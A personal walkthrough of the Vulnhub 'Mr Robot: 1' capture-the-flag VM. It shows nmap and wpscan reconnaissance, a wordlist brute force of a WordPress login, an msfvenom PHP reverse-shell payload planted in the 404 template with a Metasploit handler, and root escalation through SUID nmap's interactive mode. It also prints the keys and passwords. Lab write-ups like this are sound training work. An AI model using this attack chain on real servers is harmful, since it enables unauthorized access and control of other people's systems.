Mr Robot:1 CTF Walkthrough
Mr Robot: 1 CTF (Capture the Flag) is a downloadable Virtual Machine from Vulnhub. Which is a site that has purposely built Virtual machines for you to hack. Each one varies in difficulty and allows you to hone your skills and even pick up new ones.
If your interested in giving it a go yourself, this Virtual Machine can be downloaded here https://download.vulnhub.com/mrrobot/mrRobot.ova
Description: Based on the show Mr Robot. This VM has three keys hidden in different locations. Your goal is to find all three. Each key is Progressively difficult to find. The VM isn't too difficult. There isn't any advanced exploitation or reverse engineering. The level is considered beginner-intermediate.
So I downloaded the virtual machine from vulnhub and then just double clicked the mrRobot.ova file and it set its self up in virtualbox.
I set the network up so only the Mr Robot VM and kali Linux where on the same subnet, to make it easier to find and you don’t really want to be exposing Vulnerable Virtual machines on your live network. The VM has DHCP enabled so it gets a DHCP lease straight off the bat.
My first step is to find out what ip the VM is on and what goodies it has to offer, So I run Nmap to find all this out for me.
nmap -A 192.168.1.1/24
and it gives me this information back.
Nmap scan report for 192.168.1.103 Host is up (0.00029s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 22/tcp closed ssh 80/tcp open http Apache httpd |_http-server-header: Apache |_http-title: Site doesn't have a title (text/html). 443/tcp open ssl/http Apache httpd |_http-server-header: Apache |_http-title: Site doesn't have a title (text/html). | ssl-cert: Subject: commonName=www.example.com | Not valid before: 2015-09-16T10:45:03 |_Not valid after: 2025-09-13T10:45:03 MAC Address: 08:00:27:C1:4A:90 (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 3.X OS CPE: cpe:/o:linux:linux_kernel:3 OS details: Linux 3.10 - 3.19 Network Distance: 1 hop TRACEROUTE HOP RTT ADDRESS 1 0.29 ms 192.168.1.103
As you can see looks like we have an Apache web server running with ports 80 and 443 open, so lets check them out first.
With both http and https we get presented with a cool animation of a linux terminal booting up and Mr Robot logging in.
At the prompt the only commands that work are the 6 listed above. Each one takes you to its own page which contains all sorts of Mr Robot propaganda it looks like its a rip of a Mr Robot promotional website. Took note of each page just in case i needed it later.
http://192.168.1.103/prepare http://192.168.1.103/fsociety http://192.168.1.103/inform http://192.168.1.103/question http://192.168.1.103/wakeup http://192.168.1.103/join
Looking at the source we can see this animation has been created in javascript also there is some interesting info on line 15, I would like to just add “i am not expert in javascript” but it looks like if you have an ip of 208.185.115.6 you get taken to index.html.
At this stage I thought it was time to check out the robots.txt
http://192.168.1.103/robots.txt User-agent: * fsocity.dic key-1-of-3.txt
Boom! So it looks like I have found key-1-of-3.txt and a fsocity.dic file .
I first navigate to the key file at http://192.168.1.103/key-1-of-3.txt and get the first key 073403c8a58a1f80d943455fb30724b9
Then I download fsocity.dic which is just a dictionary file, I’m guessing this is something that we will have to use later so ill keep that somewhere safe.
When the dictionary file had finished downloading, I kind of just mashed the keyboard with adfsda after the IP address and I received wordpress 404 page as below
Clicking around the menus, I quite quickly found the Word Press login page at http://192.168.1.103/wp-login.php
Now we know its a Word Press site we can try and enumerate users using Wpscan
wpscan --url 192.168.1.103 --enumerate u
This actually did not find any users for me, so I started to use process of elimination and tried admin, root and user all giving me a Invalid username
So still with no users, I start to use names from characters in the TV series, starting at mrrobot, flipper and then we get a hit with elliot ..
Cool so we have a user the next step will be to use that dictionary file we downloaded earlier and see if we can brute force the password for this account. so lets take a look at the dictionary file…
first thing I notice when I cat the dictionary file is that its not in any sequential order. This can rectified by just running a sort command in the Linux terminal
sort fsocity.dic >fsocitysorted.dic
I cat the new fsocitysorted.dic file and noticed there are a lot of repeated words, so we can run the sort command again but pipe it into the uniq command as below, giving us a nice and tidy dictionary file for us to run our brute force against.
sort fsocity.dic | uniq > fsocitysortunique.dic
So lets use wpscan again to brute force the login using our new dictionary file as so.
wpscan --url http://192.168.1.103 --wordlist /location/of/wordlist/fsocitysortunique.dic --username elliot
This took about 3 minutes to find this password for elliot.
+----+--------+------+-----------+ | Id | Login | Name | Password | +----+--------+------+-----------+ | | elliot | | ER28-0652 | +----+--------+------+-----------+
I put the above details in to http://192.168.1.103/wp-login.php page and bingo we are into the WordPress dashboard.
Now we are into the Word Press Dashboard we can quite easily use metersploit to create a payload and gain a shell on the web server.
Our First step is to create our metersploit payload using msfvenom.
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.104 LPORT=7771 -f raw -o payload.php
Now we have our payload, we need to get this on the site and run it. The best place for this is the 404 page template
In the dashboard go to the menu on the left and click on Appearance –> Editor –> then on the right click 404 Template.
Next open up your payload with any text editor and copy the contents over the top of the 404 template and click update file.
now we need to create our payload handler in metersploit so open up a new terminal and type …..
$ msfconsole $ use exploit/multi/handler $ set payload php/meterpreter/reverse_tcp $ set LHOST 192.168.1.104 $ set LPORT 7771 $ run
After you typed ‘run’ and hit enter your payload handler should start and all we need to do now is run our payload by making the site display a 404 page and we are in.
[*] Started reverse TCP handler on 192.168.1.104:7771 [*] Starting the payload handler... [*] Sending stage (33721 bytes) to 192.168.1.104 [*] Meterpreter session 1 opened (192.168.1.104:7771 -> 192.168.1.103:54730) at 2016-08-19 17:00:48 +0100 meterpreter >
Then in meterpreter just type shell to spawn a shell on the box and then check what directory we are in and which user we are.
meterpreter > shell Process 1797 created. Channel 0 created. pwd /opt/bitnami/apps/wordpress/htdocs whoami daemon
Then I changed directory to the root of the drive and list every thing that’s there.
cd / ls bin boot dev etc home initrd.img lib lib64 lost+found media mnt opt proc root run sbin srv sys tmp usr var vmlinuz
I start by checking out the home folder, this seems to have just one folder in it called robot, so I navigate into the robot folder and it looks like we have found our next key and an md5 file.
cd home ls robot cd robot ls key-2-of-3.txt password.raw-md5
First I try to cat the contents of the key file, but I get a permission denied, I also try the password.raw-md5 file this time it does display the contents on the screen see below.
cat key-2-of-3.txt cat: key-2-of-3.txt: Permission denied cat password.raw-md5 robot:c3fcd3d76192e4007dfb496cca67e13b
So it looks like we have a username and a md5 hashed password.. I could run this through hashcat but I thought as this is a easy hackable VM, I would google the hash first and as I thought the hash comes back quite quickly as abcdefghijklmnopqrstuvwxyz.
I try and switch user to robot but I keep getting a message telling me that su must be run from terminal.
su robot su: must be run from a terminal
This shows that we don’t have a proper shell running, so we can use a bit of python foo to get full terminal access using this command below.
python -c 'import pty; pty.spawn("/bin/bash")'
We can tell we are in the proper shell as the start of the line tells us what user we are, the name of the server and then what folder we are in.
daemon@linux:/home/robot$
So we try and switch to the robot user again and we now get prompt to enter the password . Once we have entered the password for the MD5 hash we are now logged in as Robot.
daemon@linux:/home/robot$ su robot su robot Password: abcdefghijklmnopqrstuvwxyz robot@linux:~$
now that we are logged in as robot, we should be able to cat the contents of that key file as we now have the right permissions.
robot@linux:~$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959
Now with key 2 found we just have one more to find. I’m guessing to do this we need to escalate privileges again to become the root user. I tried a few exploits off exploitDB but none of these worked so i started looking at other ways to get to root.
Dumping out the list of processes shows Nmap is set to run as root.
find / -perm +6000 2>/dev/null | grep '/bin/' /bin/ping /bin/umount /bin/mount /bin/ping6 /bin/su /usr/bin/mail-touchlock /usr/bin/passwd /usr/bin/newgrp /usr/bin/screen /usr/bin/mail-unlock /usr/bin/mail-lock /usr/bin/chsh /usr/bin/crontab /usr/bin/chfn /usr/bin/chage /usr/bin/gpasswd /usr/bin/expiry /usr/bin/dotlockfile /usr/bin/sudo /usr/bin/ssh-agent /usr/bin/wall /usr/local/bin/nmap
After a lot of googling I found there is a vulnerability in Nmap, which you can set into interactive mode and allows you to run shell commands directly in nmap.
robot@linux:/$ nmap --interactive nmap --interactive Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ ) Welcome to Interactive Mode -- press h <enter> for help nmap> !sh !sh # ls ls bin dev home lib lost+found mnt proc run srv tmp var boot etc initrd.img lib64 media opt root sbin sys usr vmlinuz # cd /root cd /root # ls ls firstboot_done key-3-of-3.txt
so we escalated our privileges to root through the interactive shell and navigated to the root folder as u can see above this holds our final key which we cat to give us ….
cat key-3-of-3.txt 04787ddef27c3dee1ee161b21670b4e4
Now we have all 3 keys that’s this Virtual Machine done… It was a really good virtual machine to get started with, also finding out about the privilege escalation using Nmap was fantastic and being a fan of Mr Robot TV show really helped with keeping me interested.
Going to go have another look at vulnhub and see if there are anymore TV/Movie tie ins that I can sink my teeth into….